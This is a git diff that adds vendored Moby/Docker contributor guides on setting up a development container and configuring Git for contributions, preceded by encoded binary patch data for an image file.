zo%Wse+TrSv^ko|RDzBu2*@_IYQ`>x`mHkR8V{cu$jibbK(2pX5ark^acyJSWlAw&48OlSn9!Lcw+ zh*+@=Fn|qFCbh_$q5+F~q3btrk5taIZ?4;`(j>K4P%BXPhO(hM^jV0orAZ}joaec0ks@Un6#nB zRu;`e+N_W(C56SpuxFWl3hB=QO~BYE-Bwr!lt@pXinM6ppVv*>1v~=l1~rni0$cNnsCH#UENfp^5mh4mvg*tws&OE#IMA}&U!EBE5Y_RYW^OU3zi&9`<*fz~!Z zA}`o3>ne}~y$y7ZbJAj8_F}yMMj>BO?2j#Bce>ihq{WAh4W|e)Ma&D_l10q9#R5h0 ziHKA|a>Q4_mrskT%_5xiXU~jkoW{dT6vPnpMczA*OI+i#Wu{q3)(n?UcRy%yOCB$~ zK*k7f1ih~(k6bbG^hCDH{QimbXf9K0?+{XP-)L8#db3=rUZL{}Deh_N$W>wvcAMt} z&Uz$@QA)2~LK2L7{x=sozSMw(33ieCyU5BasIT2^N&`OU2dnC|-|x{LT{|t}A-lo7 zcxOUEUvptC00;j)j2;(S zWLLSlGR0e~KvRrq1#J;+*a(%=KD!waAgj?N9N?YvqOc=hPHyTMwlWA6Y zf=v-kfm}|wlbDbhu3dV=$B4#=0xvCUAO`Vi(Se%`h>ku%C9%bnSQrXhFw9TY6Bg<^ zBclNyKay2B3r?8b>o+GAi9;^^M7+zxPc8GJX*LYdEj)7MGOYCGR(q&MM`lD424S;S)FU>>XqM1lM2>ROL2LXe8vvj4Exx@oLOXv%tA707C8`<&wPShaQ?%@nli4ENr7TeRjHx09x=aOU; z$QGi?314OpEu0{Df!^9=d; z@p!jX<7J<$YUUlFeb9WIv6PwuLG(?y_&zgTVFX4K2@g$b{I8n5w@b=?5_faqgN^|Q z8acFxi(NL=QM5LKb0d402rEg`jYZxgF}Ezya^d3bGw#^rL7GBAuPpA)5v_q`-aQjR zYtWnK_YzjQPf`lQKn2H*()NNX)2!8Aiky|e0sz7?y6@d#{cxrE4(lM6EgXFpg!8gB zvS$jgFx79-_2LOYW~6`o&25fj7B>>(ibT^DNni&Zx}OM3W3QLwh{oruCbHd##Mlx4 zngm@w{??s>SDkZFz{2iO_Su040Rm~BdW6@;k5clFTdDSQy8{^HSzJ5 zE3Dk$Ar-cSAAXpKWHSTn?7SGz>_piFnSRt*a4u%w;f|zcbwp6jy!3=Ib>A+5T2hOT z%-vt}p^%s4YaoyansI~3#i-*3$E)-r|B2cTiOIl->=1R zuq+N9vmg90=1jxvIM8k8vfvs`9%jQ7$U6q}lVDPC-yR0w;2TfSZ+n5-rg9+by9M); z28qupk_uUZA+>60f_RLN$nsD?m!Wa4x)p~uaMa`F?HvLg@KxNChK(d8a4k+Rs41@V)x(_ytM}9OW^F#gKSceoDUwqoh+0i2}_%T5hI(Ynw2IZF8>yh9{dDy{`W!1BgJZ+#Fb#jby$W7usumNTm8>~ zd9V(3n}rZV84g4|^(ekVZMk1^+v{9hceAB+9vgA~@M0+W#eVf?8^7ipTlDUBr zIj(+~UJFh?&Q?oMD^p|Jo_kZ(zz|Sk5!7Ljp4t+10PFDn)h7c+rJ6ClNF>W@5R#Uy zk%<`!T7!eVeg~}(?j=0Ky@J1SO8xr@%3OzV&hr<_ys*m^^7}w18Fe3h>z>rODgh$b z)3%Pw(yOxrOCKh$I>)}Q1O!d|Nl;35&1Lrc0Ohm~}e4-i;Xe@NLE8XP?w5J9yh{o)A6;R*o4IZEd|TrQCFTaGn9dRSCCBPDB#IDiAwbIAJN+4ld+; zNnY-4UABi*_GxQ!*q!FcjKcUwBfzWD%BuWC2{HFWleO^&ND1+~l*o|94^!dY+XQFq zwyh^PyXzLRd~5HcfzxM}{hvsH*t3if65!UA2Yerofq!QF!_62|G5@>h!QANZk;1MQ 
zfX&_)Z)cJBxD7(bh0%n)`qHJyaA@Syc$NAj=Cc^hv2g@)hZZ4hyu^iWlY_=W2J^g- zW$>57zFsfEVb=U&gXb^;9-N9|W}l67)y?X>BVVMKR2de5sA5Vv@Y`AheVE(CZ`E&$ zwM9hoM)6mabZ;v#wbndT?R#op@_y9;u;`ta61jXAJk8f-!%7zsTMw5Z`-&LR(ym%p zKW7QyF5!Z9yTB|nAO_HGK5JXtnr=5FChehK^W_)wysFF9FGVtLuXxPC(H^9!Uh$4t z+$5}@Ju0l-GcMU|C~fGfOrIWPLyk;3h<58b`Od}%=xl{q;J(Yy!S1ouPa_Q}&s~TO z3k`fW2jr3FHQs2p=VglyPu6vj;qk=v1wFT!_)+_#_{WReHI6!AYSzF-Xs283q=?UV zT_?^r#Wf|KQ7A#}Ein2$%sT)+3mWeDiB$flLKTflXlW>t4NYSS7NfOuR?P=8Z#Hys zVk^;w4a%SRMMO3y3>$Ih%3WUBQAeN$FTDgg3|1@WC{U>_lpFHej{A77NS`-6 zC@PSrXdc<(TcPiqo$FIpr~hRCJ?^|+%&lX{&Xbt2)Ct8z#A*{v`#p3lj`d@$B8q7N zO0^uEEqYVj!;=?hXxAXu0aNkwa>}teIQ!|51kp@a;WU_o*M8V#Z#I72J}}t|xd38O zM)@6lBPVV#CgJl6**C*G7D&k*mDaC74~=l6~5j79n-N|k>rs>Nw`WWhX%nqdiK;c&BZ=+c1Fdu zR4`W37gR*8hfb#+gl!b7QjNj#P}@}A^ChI0;?+(pCwK~Vg`^^vynxAO1(30?1xlop z9oZ(_0i1JNNXH;;*TsXbH({vfimat-@jFFoPyr@9x9V7+NpYM@6M%wMZ8G4Ii5W7T~iW~F2A8+ zZIq5m+Vs1!R#V1LMU6(1aVk{ZB_myMKOc0BxSwgYT3=NETA@gg1rNrGip@V*ec@Y z8D0P>p`oR~^(}`=&!?1Pbl+nU=uXN(rokv?8ANTIc33mz&u_)*4haVu_C%G*pn?Q( zDvX!FiNNT&7r0$~J)`#tcC>Qm+;&4EUx$jRX7b>A3-*XZIQQDuAmmck$&VN~-XtAy zZ+jecR0eQBeZ}9h8tbC*FJOD2ax%)zT&&P*6fK9fK$9-<3z(r60939dHJ~ty=8bSP(^#y44-|N>2eG9 zrMjPE!ByM5xJTl6PzNUg9lROp;6_g8x7tU@IM*BESi zt?z`*6Qbu38uH5BK&HxCqii5aw$9_z^BRu*Qw%qXn-ec)t6^E=;%hz3{lL5jNEobl zKGNa=#QTzQ2%hD3TmfEEKPV7-(Xp{$O}+~W-M5RGSM-i+{0(?Vg<8xgL3Q1ptQWkN zC78Q!(p;6yZh%Lb2=0;9yZMErUjMPSS;gs84KB= zum)Hsob(*L^G39@pyzP=g16Apn`YW-LKt_`pF0sAmOCc0OL5747cq)qf^jJy(FlS6hvaU6ouj?5dcK3iL$Ve3UB1tx$znH!65O-~&UStxN2{=z68b?-`$(MZl7_o2=;+ebst8~K* zAw&eJTem?p(E`NNO*5sIAO`>3L4+i#2D?K#AJ5(BqbMEt=2NznX6wp7A=#>YD%u$j zMN3gQr`MLdWulucp4@x)N@!4QCRV&?!e~YXPN{lo7eds7@6lcGKbQ^jP!__IU;<=& zk?we5srSXqJ@YpN@wK&|vuTO&niD7hm)8l;N`MGY(T)I8vQusAWZnf@l`3g&7i5bL z0O2+S*?O-CoJ_2#RN(_Y2<6NzIEhs?TO79X`@dtcay4UsK+qtwh zmOnha=w#vRDX+LtpZR@gfLvzf2j*gt+bPs_iE?{x$sH{d4Ty}U@&(gc< zfJ$)5bd=r8V)*OXKiUAYsW*Y2CzVPMK%T=AnW}-yg5&6tq*==)***GC%+&``yb3sj zpjNrDnkVAGHN^lSwAm}(%8x*7kr@ZbDerazO1&aV=?mo*S1_5Q76yG7opkK1%ZG=7 
zNg}#bk;OX&usOpqXHoM263r{|GyzVj_6US*-*&V+^U(LO*DE(}U0DV~{%2lG?=MhE zaK6Z|8g#F`+q;S|1RivT;j(opuZ{s>nU!?wekO2z#3zh9x;5@Ce(V6%Iqw--wI}V2 zEUv9o11a@kKsYd+@MQuTT^#IJ;IR*!UI=eA?GF*pW!V90o?;5{ww(Z#`5}K57HbIU z{h*}(17v&o@o=)$C!VQIb@((atx5M3*-wL zEd$)|l$0Qoz(Dw3Xt(aT&&a)N&muwo<(!L#i-t21q_vrG!~g9)_H{W$U@=S#r{6R2 z@NVySXA1&;A#$HYf!=HmN@otRJ*LMb7BQEA)Z}tZZnA{4#KM>$$Yj%R;M(;VI8}R0 z`YV&N+DU|>+oyp=VbnYe>@7yBqIuP&WjAh~EkkG_7qVhzdpx+;(hzy64)EJ4Wl~B9 z2C+@d0pgz3%3a|l2gfZaxbrw~9ocmS5nmfb>vy>*Wo(;mg#y&a^#mzao&-Fb?4 zwsW`?I<0Xyk55(kH||socoP!As-J38s7kG({X3I7J~ zi5OM7I$Y7o-z}kg^0Pn zhz2sE=7Q`Fhwu(8>j%f6c8>k|t%vLca;0-Y$|fjTN|_RQ#}LRRgG@MXM>f%)s{YcF>Jl zeMW;>(rs3p_a~w4ii)2y@DLAutKO)T!T)YB=+(5G@(^MmlDzG3#TCV5xlg;pS@*t_ zHCkd0$Uep}VJk959j*Wm#serCm7fmtxXzd3^p|BlwbeA>nXsN6I+L0*zWgZI@vXu0 zWFJLC;0pPmxTRic)K%~(9BvgCsoefM@A-@keQW4x^F4}ceVXcP6Z7r1c;T)fo(`pP z2G-qp$8oflTxjYIg13jjY*#m+jk&Rfhqq~WyNz_DV0(5nygP98yaQ8n0+%PnxKbG9 zOp?UYkZ=2TNCX}^@ea)jdrIQsQocr_5@G8D0B#Lxu2rvYDeEWInHflu>a+W1d#~yw z1g&Ix!z58Ex{PwCLcvGgw3R9a^dSV=u+Q)8v%ECBDnQ@HA8+CMa?^D1I>C^NAD*OM zc4`7=@ff6**66X6aQ?ySX`{B|l_9lE#XQ`x(*zHE~+4-q~YD%6puMOZoQH=-t0*gs8=Sy z|0}Osz^Rk}r2sGIGURsn;HqWc4VVv^-}9IWEo#N?Tj!3G#W7uTSv#wP*D-mh_K+rr z{h-k`dk)l{X028uHC2Ra@>%kzQssRoRWXw`ItAbIiwZB}wJtq(qk?R6cDXaKa#1OB zHtec2$Ucg$3&%=z+yR1eFa1x(C9-wQ(H?AwN zE8IhptVy!&7sPWHbyOzlHvGt%+wi~h-M7FxA27q`2P$6qg4HG5Aw>kNC*c6=3)C;m z`ddbN+of#M-i-lutZBuf_&qa}L&89$s(8z-*!Aw6c@$A3PS%f&ny6y21<%H{d&aEo ztfP|4(Z}sWVO_HU{(ox;Kax_-JWE~_{9I0Aq5Z;!by+k2eJYrG^|e#=)2JgZy9lmJ z1QdNkg};`wZ?hAFDzg#x{Wp>_Qv8COI5g1D`X-*Zggo~sNdf_qM2eUem8Oc>|>R)l%MPo-=@ z<=1>KMn_G5=(fkk1Zz8*EwvyX9==dX-6QVM`#AQde4ON$);Ovvg3Uu!vB2Dtn#U!%cseRjUy1nHSBP%A#;rRvA+y_XOX--#`ZUQ^ zY@sy{%r`uM(RFf$)P*Jw5;Fhhm1OpJ_89%9NksM)>bmagq_bVTiGmVjD``^_lrvMd zgVzF;_{UYabNg$F{5wBkFvV;A_NozhTcnAc2i;#tg!9Qi$+n-tt1jtNjf!%McbhGm zI+7lH;w--q^wxdm>rRRf9ZaoFaNO)FR@^|G@A7i?@;CWA%igxoFr?q{`2D$Ue*c9* zR&2iU{MC%(uN=VXF_@=N3CD;?4b$B&n8fDGfL`*t>o|rlw6ZPMhfYB*5c#pjke160 z`_d-ipH5UkFyp1&2X)U#PXe9%_1Dsgu>$uU-m~jO9$WA0pRCLQuu&mFO8EowK}?#f 
zJc`PjSc2ibK;5=jgT@2t@MZlBo_Ato6i#yz#t|?sF2miOHD5B%Zck*z8GRNjS^BBX83QE`$D`< zmW3Uap`rcOC_;9gu<;DhsR!5gYxGb|dk?-7N?Zc=>5JLP{b<+@@#gIGt3=WQBw~WE z@;Q!O=8n}vlVLiY92-^aw!+~Y6|9O7jq+1bA%$%r(kVHxh3=f#_H#JcP1+Nq_v@0E zuCYkBpfilv3?wW;p-#)PVzYG@ySx4L_3;|c@t z7tV|83v+D*8vH$U%`Yhz*&D7V4#MfE-fHI)}@i$xfEO}w@o7hh=>oK?#5j{=Bl${8#tz=ELvt*WU+?EF`yIpcKO$Z{V z$+Vjq4n-#lZ2jk&&N0f}bUmk%mTD?U$eQG^3g60>k-0NBftL?3;K>qCmEV+o{vfR# z=4b`07Z?MbZ-C)*=OT7QNK<)Etg=okF_ynMiN9bQ8H}l9U1OoU`lTX()I4htEc8{! zfW&7UyzvTqBuSTSqDjJ?jJ@|AvY&VZ3D)``bwdR3Kbk*cf-FIc|5FW_cD>oDOg2-;K$^j za^5&KY|LN9G)^R6*2U-4i2njlc<`G~A0%9>?gdHsfQ88qW4o_#3&=~%pQRRr7($Tg zlPp*34>g@=8V9F`P~e>6OE4$nGOE`TK#6u}Jl$ETLjjjG{5pWq3b?m}+iD)nw@j2S z40Nl%4IHeR`D@Xk=v|ErT2L!uDSNVwFp_D-()cwq`HKQ&Y+oMfh_M^Ws;X}U&|;h7Ae}V(#>z3URGwi0h3@OP<_zRagZWD_5p}1ZLS18 zON~92_w{tZrKHEx^15wLWIR6@5`^g|`9x*Dexc6Z{7CxxF{L&k7MAwhvwD%~y6so5 z$Gbcj^HvY^1e32lzi}~dVj%IG<%5sp5mH!K5mIX&UriUzbX2fBH%eooL}Ot=|Ni-^ z%mi)u^_r>j#~**}fIbp@=+Df1Li$ zPyKl{Ah`v8er?Y@xxkZ4_;dR|PV)^q{^Y%X-t3=;tNy=r8mQ?5QU88Z&=Z{h_nZ2^ zd>W$vjjQ?DS^jK#ojK+hCh0TKBcjJR$%bOPBdEadzq?-(=nsD$ezHAK>EGLC7dqR& zUriu6RsP-m$bN1A$7w2|Hl$>O{fq2|I_>*Z=1d@rd&8Vo(283gD)9{1qTS@Uj^T&F+?a;9Oji7ywJ3| zDO_*O8iCiDIfc(0a?t;RMFV<7zsF+UKmIuBPbWK&KL_2ubI@@7--c@FUGSe>>Eu=8 zpA*AtXoUXfCg>gioGVuU$EK5E{MVJ`TR^*Wpds_;YhZyWnNpPSQ_5!D0rX9n%E@t$ z`U-k?{BAwq)YsqE89?6}5pz0u3o=rht0hgTOQo-UgY)DHY3R|4M9JD*zxI1;bE#ys z7bK5g{QE-#UH|yF-yiyOn$jhLuH)CG{m*tfnW9eGj1v9xCjU4T*++FU3;cQa+FT(* zwCD{3t6y)jiqQp^#&PNA#pJK<_nrT!(svWw&Z_oY_o4scYB+QOlxQxDBm=OsQ*H|zKYmgU?NqynQZ7-n Hxck2V))LuH literal 0 HcmV?d00001 diff --git a/vendor/github.com/docker/docker/docs/contributing/set-up-dev-env.md b/vendor/github.com/docker/docker/docs/contributing/set-up-dev-env.md new file mode 100644 index 0000000000..3d56c0b8c7 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/contributing/set-up-dev-env.md @@ -0,0 +1,372 @@ +### Work with a development container + +In this section, you learn to develop like the Moby Engine core team. 
+The `moby/moby` repository includes a `Dockerfile` at its root. This file defines +Moby's development environment. The `Dockerfile` lists the environment's +dependencies: system libraries and binaries, Go environment, Go dependencies, +etc. + +Moby's development environment is itself, ultimately a Docker container. +You use the `moby/moby` repository and its `Dockerfile` to create a Docker image, +run a Docker container, and develop code in the container. + +If you followed the procedures that [set up Git for contributing](./set-up-git.md), you should have a fork of the `moby/moby` +repository. You also created a branch called `dry-run-test`. In this section, +you continue working with your fork on this branch. + +## Task 1. Remove images and containers + +Moby developers run the latest stable release of the Docker software. They clean their local hosts of +unnecessary Docker artifacts such as stopped containers or unused images. +Cleaning unnecessary artifacts isn't strictly necessary, but it is good +practice, so it is included here. + +To remove unnecessary artifacts: + +1. Verify that you have no unnecessary containers running on your host. + + ```none + $ docker ps -a + ``` + + You should see something similar to the following: + + ```none + CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES + ``` + + There are no running or stopped containers on this host. A fast way to + remove old containers is the following: + + You can now use the `docker system prune` command to achieve this: + + ```none + $ docker system prune -a + ``` + + Older versions of the Docker Engine should reference the command below: + + ```none + $ docker rm $(docker ps -a -q) + ``` + + This command uses `docker ps` to list all containers (`-a` flag) by numeric + IDs (`-q` flag). Then, the `docker rm` command removes the resulting list. + If you have running but unused containers, stop and then remove them with + the `docker stop` and `docker rm` commands. + +2. 
Verify that your host has no dangling images. + + ```none + $ docker images + ``` + + You should see something similar to the following: + + ```none + REPOSITORY TAG IMAGE ID CREATED SIZE + ``` + + This host has no images. You may have one or more _dangling_ images. A + dangling image is not used by a running container and is not an ancestor of + another image on your system. A fast way to remove dangling image is + the following: + + ```none + $ docker rmi -f $(docker images -q -a -f dangling=true) + ``` + + This command uses `docker images` to list all images (`-a` flag) by numeric + IDs (`-q` flag) and filter them to find dangling images (`-f dangling=true`). + Then, the `docker rmi` command forcibly (`-f` flag) removes + the resulting list. If you get a "docker: "rmi" requires a minimum of 1 argument." + message, that means there were no dangling images. To remove just one image, use the + `docker rmi ID` command. + +## Task 2. Start a development container + +If you followed the last procedure, your host is clean of unnecessary images and +containers. In this section, you build an image from the Engine development +environment and run it in the container. Both steps are automated for you by the +Makefile in the Engine code repository. The first time you build an image, it +can take over 15 minutes to complete. + +1. Open a terminal. + + For [Docker Toolbox](https://github.com/docker/toolbox) users, use `docker-machine status your_vm_name` to make sure your VM is running. You + may need to run `eval "$(docker-machine env your_vm_name)"` to initialize your + shell environment. If you use Docker for Mac or Docker for Windows, you do not need + to use Docker Machine. + +2. Change into the root of the `moby-fork` repository. + + ```none + $ cd ~/repos/moby-fork + ``` + + If you are following along with this guide, you created a `dry-run-test` + branch when you [set up Git for contributing](./set-up-git.md). + +3. Ensure you are on your `dry-run-test` branch. 
+ + ```none + $ git checkout dry-run-test + ``` + + If you get a message that the branch doesn't exist, add the `-b` flag (`git checkout -b dry-run-test`) so the + command both creates the branch and checks it out. + +4. Use `make` to build a development environment image and run it in a container. + + ```none + $ make BIND_DIR=. shell + ``` + + Using the instructions in the + `Dockerfile`, the build may need to download and / or configure source and other images. On first build this process may take between 5 - 15 minutes to create an image. The command returns informational messages as it runs. A + successful build returns a final message and opens a Bash shell into the + container. + + ```none + Successfully built 3d872560918e + Successfully tagged docker-dev:dry-run-test + docker run --rm -i --privileged -e BUILDFLAGS -e KEEPBUNDLE -e DOCKER_BUILD_GOGC -e DOCKER_BUILD_PKGS -e DOCKER_CLIENTONLY -e DOCKER_DEBUG -e DOCKER_EXPERIMENTAL -e DOCKER_GITCOMMIT -e DOCKER_GRAPHDRIVER=devicemapper -e DOCKER_INCREMENTAL_BINARY -e DOCKER_REMAP_ROOT -e DOCKER_STORAGE_OPTS -e DOCKER_USERLANDPROXY -e TESTDIRS -e TESTFLAGS -e TIMEOUT -v "home/ubuntu/repos/docker/bundles:/go/src/github.com/docker/docker/bundles" -t "docker-dev:dry-run-test" bash + # + ``` + + At this point, your prompt reflects the container's BASH shell. + +5. List the contents of the current directory (`/go/src/github.com/docker/docker`). + + You should see the image's source from the `/go/src/github.com/docker/docker` + directory. + + ![List example](images/list_example.png) + +6. Make a `dockerd` binary. + + ```none + # hack/make.sh binary + Removing bundles/ + + ---> Making bundle: binary (in bundles/binary) + Building: bundles/binary-daemon/dockerd-17.06.0-dev + Created binary: bundles/binary-daemon/dockerd-17.06.0-dev + Copying nested executables into bundles/binary-daemon + + ``` + +7. Run `make install`, which copies the binary to the container's + `/usr/local/bin/` directory. 
+ + ```none + # make install + ``` + +8. Start the Engine daemon running in the background. + + ```none + # dockerd -D & + ...output snipped... + DEBU[0001] Registering POST, /networks/{id:.*}/connect + DEBU[0001] Registering POST, /networks/{id:.*}/disconnect + DEBU[0001] Registering DELETE, /networks/{id:.*} + INFO[0001] API listen on /var/run/docker.sock + DEBU[0003] containerd connection state change: READY + ``` + + The `-D` flag starts the daemon in debug mode. The `&` starts it as a + background process. You'll find these options useful when debugging code + development. You will need to hit `return` in order to get back to your shell prompt. + + > **Note**: The following command automates the `build`, + > `install`, and `run` steps above. Once the command below completes, hit `ctrl-z` to suspend the process, then run `bg 1` and hit `enter` to resume the daemon process in the background and get back to your shell prompt. + + ```none + hack/make.sh binary install-binary run + ``` + +9. Inside your container, check your Docker versions: + + ```none + # docker version + Client: + Version: 17.06.0-ce + API version: 1.30 + Go version: go1.8.3 + Git commit: 02c1d87 + Built: Fri Jun 23 21:15:15 2017 + OS/Arch: linux/amd64 + + Server: + Version: dev + API version: 1.35 (minimum version 1.12) + Go version: go1.9.2 + Git commit: 4aa6362da + Built: Sat Dec 2 05:22:42 2017 + OS/Arch: linux/amd64 + Experimental: false + ``` + + Notice the split versions between client and server, which might be + unexpected. In more recent times the Docker CLI component (which provides the + `docker` command) has split out from the Moby project and is now maintained in: + + * [docker/cli](https://github.com/docker/cli) - The Docker CLI source-code; + * [docker/docker-ce](https://github.com/docker/docker-ce) - The Docker CE + edition project, which assembles engine, CLI and other components. 
+ + The Moby project now defaults to a [fixed + version](https://github.com/docker/docker-ce/commits/v17.06.0-ce) of the + `docker` CLI for integration tests. + + You may have noticed the following message when starting the container with the `shell` command: + + ```none + Makefile:123: The docker client CLI has moved to github.com/docker/cli. For a dev-test cycle involving the CLI, run: + DOCKER_CLI_PATH=/host/path/to/cli/binary make shell + then change the cli and compile into a binary at the same location. + ``` + + By setting `DOCKER_CLI_PATH` you can supply a newer `docker` CLI to the + server development container for testing and for `integration-cli` + test-execution: + + ```none + make DOCKER_CLI_PATH=/home/ubuntu/git/docker-ce/components/packaging/static/build/linux/docker/docker BIND_DIR=. shell + ... + # which docker + /usr/local/cli/docker + # docker --version + Docker version 17.09.0-dev, build + ``` + + This Docker CLI should be built from the [docker-ce + project](https://github.com/docker/docker-ce) and needs to be a Linux + binary. + + Inside the container you are running a development version. This is the version + on the current branch. It reflects the value of the `VERSION` file at the + root of your `docker-fork` repository. + +10. Run the `hello-world` image. + + ```none + # docker run hello-world + ``` + +11. List the image you just downloaded. + + ```none + # docker images + REPOSITORY TAG IMAGE ID CREATED SIZE + hello-world latest c54a2cc56cbb 3 months ago 1.85 kB + ``` + +12. Open another terminal on your local host. + +13. List the container running your development container. + + ```none + ubuntu@ubuntu1404:~$ docker ps + CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES + a8b2885ab900 docker-dev:dry-run-test "hack/dind bash" 43 minutes ago Up 43 minutes hungry_payne + ``` + + Notice that the tag on the container is marked with the `dry-run-test` branch name. + + +## Task 3. 
Make a code change + +At this point, you have experienced the "Moby inception" technique. That is, +you have: + +* forked and cloned the Moby Engine code repository +* created a feature branch for development +* created and started an Engine development container from your branch +* built a binary inside of your development container +* launched a `docker` daemon using your newly compiled binary +* called the `docker` client to run a `hello-world` container inside + your development container + +Running the `make BIND_DIR=. shell` command mounted your local Docker repository source into +your Docker container. + + > **Note**: Inspecting the `Dockerfile` shows a `COPY . /go/src/github.com/docker/docker` instruction, suggesting that dynamic code changes will _not_ be reflected in the container. However inspecting the `Makefile` shows that the current working directory _will_ be mounted via a `-v` volume mount. + +When you start to develop code though, you'll +want to iterate code changes and builds inside the container. If you have +followed this guide exactly, you have a bash shell running a development +container. + +Try a simple code change and see it reflected in your container. For this +example, you'll edit the help for the `attach` subcommand. + +1. If you don't have one, open a terminal in your local host. + +2. Make sure you are in your `moby-fork` repository. + + ```none + $ pwd + /Users/mary/go/src/github.com/moxiegirl/moby-fork + ``` + + Your location should be different because, at least, your username is + different. + +3. Open the `cmd/dockerd/docker.go` file. + +4. Edit the command's help message. + + For example, you can edit this line: + + ```go + Short: "A self-sufficient runtime for containers.", + ``` + + And change it to this: + + ```go + Short: "A self-sufficient and really fun runtime for containers.", + ``` + +5. Save and close the `cmd/dockerd/docker.go` file. + +6. Go to your running docker development container shell. + +7. 
Rebuild the binary by using the command `hack/make.sh binary` in the docker development container shell. + +8. Stop Docker if it is running. + +9. Copy the binaries to **/usr/bin** by entering the following commands in the docker development container shell. + + ``` + hack/make.sh binary install-binary + ``` + +10. To view your change, run the `dockerd --help` command in the docker development container shell. + + ```bash + # dockerd --help + + Usage: dockerd COMMAND + + A self-sufficient and really fun runtime for containers. + + Options: + ... + + ``` + +You've just done the basic workflow for changing the Engine code base. You made +your code changes in your feature branch. Then, you updated the binary in your +development container and tried your change out. If you were making a bigger +change, you might repeat or iterate through this flow several times. + +## Where to go next + +Congratulations, you have successfully achieved Docker inception. You've had a +small experience of the development process. You've set up your development +environment and verified almost all the essential processes you need to +contribute. Of course, before you start contributing, [you'll need to learn one +more piece of the development process, the test framework](test.md). diff --git a/vendor/github.com/docker/docker/docs/contributing/set-up-git.md b/vendor/github.com/docker/docker/docs/contributing/set-up-git.md new file mode 100644 index 0000000000..f320c2716c --- /dev/null +++ b/vendor/github.com/docker/docker/docs/contributing/set-up-git.md @@ -0,0 +1,280 @@ +### Configure Git for contributing + +Work through this page to configure Git and a repository you'll use throughout +the Contributor Guide. The work you do further in the guide, depends on the work +you do here. + +## Task 1. Fork and clone the Moby code + +Before contributing, you first fork the Moby code repository. A fork copies +a repository at a particular point in time. 
GitHub tracks for you where a fork +originates. + +As you make contributions, you change your fork's code. When you are ready, +you make a pull request back to the original Docker repository. If you aren't +familiar with this workflow, don't worry, this guide walks you through all the +steps. + +To fork and clone Moby: + +1. Open a browser and log into GitHub with your account. + +2. Go to the moby/moby repository. + +3. Click the "Fork" button in the upper right corner of the GitHub interface. + + ![Branch Signature](images/fork_docker.png) + + GitHub forks the repository to your GitHub account. The original + `moby/moby` repository becomes a new fork `YOUR_ACCOUNT/moby` under + your account. + +4. Copy your fork's clone URL from GitHub. + + GitHub allows you to use HTTPS or SSH protocols for clones. You can use the + `git` command line or clients like Subversion to clone a repository. + + ![Copy clone URL](images/copy_url.png) + + This guide assume you are using the HTTPS protocol and the `git` command + line. If you are comfortable with SSH and some other tool, feel free to use + that instead. You'll need to convert what you see in the guide to what is + appropriate to your tool. + +5. Open a terminal window on your local host and change to your home directory. + + ```bash + $ cd ~ + ``` + + In Windows, you'll work in your Docker Quickstart Terminal window instead of + Powershell or a `cmd` window. + +6. Create a `repos` directory. + + ```bash + $ mkdir repos + ``` + +7. Change into your `repos` directory. + + ```bash + $ cd repos + ``` + +8. Clone the fork to your local host into a repository called `moby-fork`. + + ```bash + $ git clone https://github.com/moxiegirl/moby.git moby-fork + ``` + + Naming your local repo `moby-fork` should help make these instructions + easier to follow; experienced coders don't typically change the name. + +9. Change directory into your new `moby-fork` directory. 
+ + ```bash + $ cd moby-fork + ``` + + Take a moment to familiarize yourself with the repository's contents. List + the contents. + +## Task 2. Set your signature and an upstream remote + +When you contribute to Docker, you must certify you agree with the +Developer Certificate of Origin. +You indicate your agreement by signing your `git` commits like this: + +``` +Signed-off-by: Pat Smith +``` + +To create a signature, you configure your username and email address in Git. +You can set these globally or locally on just your `moby-fork` repository. +You must sign with your real name. You can sign your git commit automatically +with `git commit -s`. Moby does not accept anonymous contributions or contributions +through pseudonyms. + +As you change code in your fork, you'll want to keep it in sync with the changes +others make in the `moby/moby` repository. To make syncing easier, you'll +also add a _remote_ called `upstream` that points to `moby/moby`. A remote +is just another project version hosted on the internet or network. + +To configure your username, email, and add a remote: + +1. Change to the root of your `moby-fork` repository. + + ```bash + $ cd moby-fork + ``` + +2. Set your `user.name` for the repository. + + ```bash + $ git config --local user.name "FirstName LastName" + ``` + +3. Set your `user.email` for the repository. + + ```bash + $ git config --local user.email "emailname@mycompany.com" + ``` + +4. Set your local repo to track changes upstream, on the `moby/moby` repository. + + ```bash + $ git remote add upstream https://github.com/moby/moby.git + ``` + +5. Check the result in your `git` configuration. 
+ + ```bash + $ git config --local -l + core.repositoryformatversion=0 + core.filemode=true + core.bare=false + core.logallrefupdates=true + remote.origin.url=https://github.com/moxiegirl/moby.git + remote.origin.fetch=+refs/heads/*:refs/remotes/origin/* + branch.master.remote=origin + branch.master.merge=refs/heads/master + user.name=Mary Anthony + user.email=mary@docker.com + remote.upstream.url=https://github.com/moby/moby.git + remote.upstream.fetch=+refs/heads/*:refs/remotes/upstream/* + ``` + + To list just the remotes use: + + ```bash + $ git remote -v + origin https://github.com/moxiegirl/moby.git (fetch) + origin https://github.com/moxiegirl/moby.git (push) + upstream https://github.com/moby/moby.git (fetch) + upstream https://github.com/moby/moby.git (push) + ``` + +## Task 3. Create and push a branch + +As you change code in your fork, make your changes on a repository branch. +The branch name should reflect what you are working on. In this section, you +create a branch, make a change, and push it up to your fork. + +This branch is just for testing your config for this guide. The changes are part +of a dry run, so the branch name will be dry-run-test. To create and push +the branch to your fork on GitHub: + +1. Open a terminal and go to the root of your `moby-fork`. + + ```bash + $ cd moby-fork + ``` + +2. Create a `dry-run-test` branch. + + ```bash + $ git checkout -b dry-run-test + ``` + + This command creates the branch and switches the repository to it. + +3. Verify you are in your new branch. + + ```bash + $ git branch + * dry-run-test + master + ``` + + The current branch has an * (asterisk) marker. So, these results show you + are on the right branch. + +4. Create a `TEST.md` file in the repository's root. + + ```bash + $ touch TEST.md + ``` + +5. Edit the file and add your email and location. + + ![Add your information](images/contributor-edit.png) + + You can use any text editor you are comfortable with. + +6. Save and close the file. + +7. 
Check the status of your branch. + + ```bash + $ git status + On branch dry-run-test + Untracked files: + (use "git add ..." to include in what will be committed) + + TEST.md + + nothing added to commit but untracked files present (use "git add" to track) + ``` + + You've only changed the one file. It is untracked so far by git. + +8. Add your file. + + ```bash + $ git add TEST.md + ``` + + That is the only _staged_ file. Stage is fancy word for work that Git is + tracking. + +9. Sign and commit your change. + + ```bash + $ git commit -s -m "Making a dry run test." + [dry-run-test 6e728fb] Making a dry run test + 1 file changed, 1 insertion(+) + create mode 100644 TEST.md + ``` + + Commit messages should have a short summary sentence of no more than 50 + characters. Optionally, you can also include a more detailed explanation + after the summary. Separate the summary from any explanation with an empty + line. + +10. Push your changes to GitHub. + + 